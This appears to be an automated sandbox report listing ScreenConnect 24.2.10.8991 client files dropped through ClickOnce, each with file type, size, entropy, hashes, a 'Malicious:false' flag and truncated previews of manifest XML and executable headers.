                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                Malicious:false
